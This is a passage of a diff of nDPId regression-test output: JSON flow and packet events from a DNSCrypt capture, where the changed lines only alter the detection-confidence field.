AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33521,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33521,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":228,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312105} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":228,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312105,"pkt":"REREREREZmZmZmZmCABFAABQRf8Aub0RhNgKAAABMw8+QQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":43714,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":946739312105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312105,"pkt":"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"} 
-00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":43714,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":43714,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":230,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312106,"flow_last_seen":946739312106,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312106,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":60735,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":946739312106,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312106,"pkt":"REREREREZmZmZmZmCABFAAIcRgFAAL0RQ8MKAAABMw8+Qe0\/AbsCCDQmxUcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAQAAAAAAAAAAAAHBAAwBvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":230,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312106,"flow_last_seen":946739312106,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312106,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":60735,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":230,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312106,"flow_last_seen":946739312106,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312106,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":60735,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":946739312130,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":946739312130,"pkt":"ZmZmZmZmRERERERECABFAADZ1MsAADURfjwzDz5BCgAAAQG7l5wAxS3cxUiBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAG60zsERLlFII2wj6zTIwofCbgq4wxjKMp9YEu9fS884Cf11c1Q4cTQ+J+ZjK7ZH4aaqK8VPbAGFYW80ueYrfwU8FAQJxEup2Hwk1EI2Qz7npiyDDRkpQyGDCxkaPRZtbjwUBAnES6nYAAAAAV9TrQRfVP6E"} 
00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":946739312132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":946739312132,"pkt":"ZmZmZmZmRERERERECABFAADZ1MwAADURfjszDz5BCgAAAQG73XAAxegJxUaBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAG60zsERLlFII2wj6zTIwofCbgq4wxjKMp9YEu9fS884Cf11c1Q4cTQ+J+ZjK7ZH4aaqK8VPbAGFYW80ueYrfwU8FAQJxEup2Hwk1EI2Qz7npiyDDRkpQyGDCxkaPRZtbjwUBAnES6nYAAAAAV9TrQRfVP6E"} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":41913,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":946739312132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312132,"pkt":"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"} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":41913,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":41913,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":37890,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":946739312132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAAXcwbUgAL0RbKUKAAABLZm7YJQCEPcGBM6aMPUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9zdGgtZG5zY3J5cHQtc2UAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":37890,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":37890,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":235,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312132} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":235,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAABQwbUAub0RkXgKAAABLZm7YAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":45987,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":946739312132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAAXcwbYgAL0RbKQKAAABLZm7YLOjEPcGBK77MPMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9zdGgtZG5zY3J5cHQtc2UAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":45987,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 